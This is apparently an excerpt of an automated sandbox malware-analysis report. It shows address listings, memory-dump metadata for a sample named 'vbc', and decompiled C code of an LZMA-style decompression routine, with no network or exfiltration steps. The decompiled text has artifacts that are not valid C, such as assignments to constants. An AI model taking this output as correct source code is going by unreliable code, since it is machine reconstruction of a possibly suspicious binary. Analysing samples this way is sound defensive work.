                          											L172:
                          											return _t535;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          						__eax =  *(__ebp - 0x50);
                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          						__eax =  *(__ebp - 0x58);
                          						__esi = __edx + __eax;
                          						 *(__ebp - 0x54) = __esi;
                          						__ax =  *__esi;
                          						__edi = __ax & 0x0000ffff;
                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          						if( *(__ebp - 0xc) >= __ecx) {
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          							__cx = __ax;
                          							__cx = __ax >> 5;
                          							__eax = __eax - __ecx;
                          							__edx = __edx + 1;
                          							 *__esi = __ax;
                          							 *(__ebp - 0x50) = __edx;
                          						} else {
                          							 *(__ebp - 0x10) = __ecx;
                          							0x800 = 0x800 - __edi;
                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          							 *__esi = __cx;
                          						}
                          						if( *(__ebp - 0x10) >= 0x1000000) {
                          							goto L148;
                          						} else {
                          							goto L146;
                          						}
                          					}
                          					goto L1;
                          				}
                          			}








                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00000000
                          0x0040676f
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00406811
                          0x00000000
                          0x00406686

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                          • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406398() {
                          				unsigned short _t532;
                          				signed int _t533;
                          				void _t534;
                          				void* _t535;
                          				signed int _t536;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						L89:
                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                          						L69:
                          						_t606 =  *(_t613 - 0x58);
                          						 *(_t613 - 0x84) = 0x12;
                          						L132:
                          						 *(_t613 - 0x54) = _t606;
                          						L133:
                          						_t532 =  *_t606;
                          						_t589 = _t532 & 0x0000ffff;
                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          						if( *(_t613 - 0xc) >= _t565) {
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          							 *(_t613 - 0x40) = 1;
                          							_t533 = _t532 - (_t532 >> 5);
                          							 *_t606 = _t533;
                          						} else {
                          							 *(_t613 - 0x10) = _t565;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                          						}
                          						if( *(_t613 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t534 =  *(_t613 - 0x84);
                          							L140:
                          							 *(_t613 - 0x88) = _t534;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						if( *(__ebp - 0x60) == 0) {
                          							L171:
                          							_t536 = _t535 | 0xffffffff;
                          							L172:
                          							return _t536;
                          						}
                          						__eax = 0;
                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          						0 | _t258 = _t258 + _t258 + 9;
                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          						L75:
                          						if( *(__ebp - 0x64) == 0) {
                          							 *(__ebp - 0x88) = 0x1b;
                          							L170:
                          							_t568 = 0x22;
                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          							_t536 = 0;
                          							goto L172;
                          						}
                          						__eax =  *(__ebp - 0x14);
                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          						if(__eax >=  *(__ebp - 0x74)) {
                          							__eax = __eax +  *(__ebp - 0x74);
                          						}
                          						__edx =  *(__ebp - 8);
                          						__cl =  *(__eax + __edx);
                          						__eax =  *(__ebp - 0x14);
                          						 *(__ebp - 0x5c) = __cl;
                          						 *(__eax + __edx) = __cl;
                          						__eax = __eax + 1;
                          						__edx = 0;
                          						_t274 = __eax %  *(__ebp - 0x74);
                          						__eax = __eax /  *(__ebp - 0x74);
                          						__edx = _t274;
                          						__eax =  *(__ebp - 0x68);
                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          						_t283 = __ebp - 0x64;
                          						 *_t283 =  *(__ebp - 0x64) - 1;
                          						 *( *(__ebp - 0x68)) = __cl;
                          						L79:
                          						 *(__ebp - 0x14) = __edx;
                          						L80:
                          						 *(__ebp - 0x88) = 2;
                          					}
                          					L1:
                          					_t535 =  *(_t613 - 0x88);
                          					if(_t535 > 0x1c) {
                          						goto L171;
                          					}
                          					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t613 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t535 =  *( *(_t613 - 0x70));
                          							if(_t535 > 0xe1) {
                          								goto L171;
                          							}
                          							_t539 = _t535 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t609 = _t539 / _t570;
                          							_t541 = _t539 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t604 = _t541 % _t571 & 0x000000ff;
                          							 *(_t613 - 0x3c) = _t604;
                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          								L10:
                          								if(_t612 == 0) {
                          									L12:
                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t612 = _t612 - 1;
                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          								} while (_t612 != 0);
                          								goto L12;
                          							}
                          							if( *(_t613 - 4) != 0) {
                          								GlobalFree( *(_t613 - 4));
                          							}
                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t613 - 4) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t45 = _t613 - 0x48;
                          							 *_t45 =  *(_t613 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t613 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t547 =  *(_t613 - 0x40);
                          							if(_t547 ==  *(_t613 - 0x74)) {
                          								L20:
                          								 *(_t613 - 0x48) = 5;
                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t613 - 0x74) = _t547;
                          							if( *(_t613 - 8) != 0) {
                          								GlobalFree( *(_t613 - 8));
                          							}
                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          							 *(_t613 - 8) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          							 *(_t613 - 0x84) = 6;
                          							 *(_t613 - 0x4c) = _t554;
                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							_t67 = _t613 - 0x70;
                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          							if( *(_t613 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							__edx = 0;
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x34) = 1;
                          								 *(__ebp - 0x84) = 7;
                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          							__esi =  *(__ebp - 0x60);
                          							__cl = 8;
                          							__cl = 8 -  *(__ebp - 0x3c);
                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          							__ecx =  *(__ebp - 0x3c);
                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          							__ecx =  *(__ebp - 4);
                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          							__eflags =  *(__ebp - 0x38) - 4;
                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							if( *(__ebp - 0x38) >= 4) {
                          								__eflags =  *(__ebp - 0x38) - 0xa;
                          								if( *(__ebp - 0x38) >= 0xa) {
                          									_t98 = __ebp - 0x38;
                          									 *_t98 =  *(__ebp - 0x38) - 6;
                          									__eflags =  *_t98;
                          								} else {
                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          								}
                          							} else {
                          								 *(__ebp - 0x38) = 0;
                          							}
                          							__eflags =  *(__ebp - 0x34) - __edx;
                          							if( *(__ebp - 0x34) == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L61;
                          							} else {
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__ecx =  *(__ebp - 8);
                          								__ebx = 0;
                          								__ebx = 1;
                          								__al =  *((intOrPtr*)(__eax + __ecx));
                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          								goto L41;
                          							}
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L69;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							goto L0;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							goto L89;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							L37:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xd;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t122 = __ebp - 0x70;
                          							 *_t122 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t122;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L39:
                          							__eax =  *(__ebp - 0x40);
                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          								goto L48;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L54;
                          							}
                          							L41:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
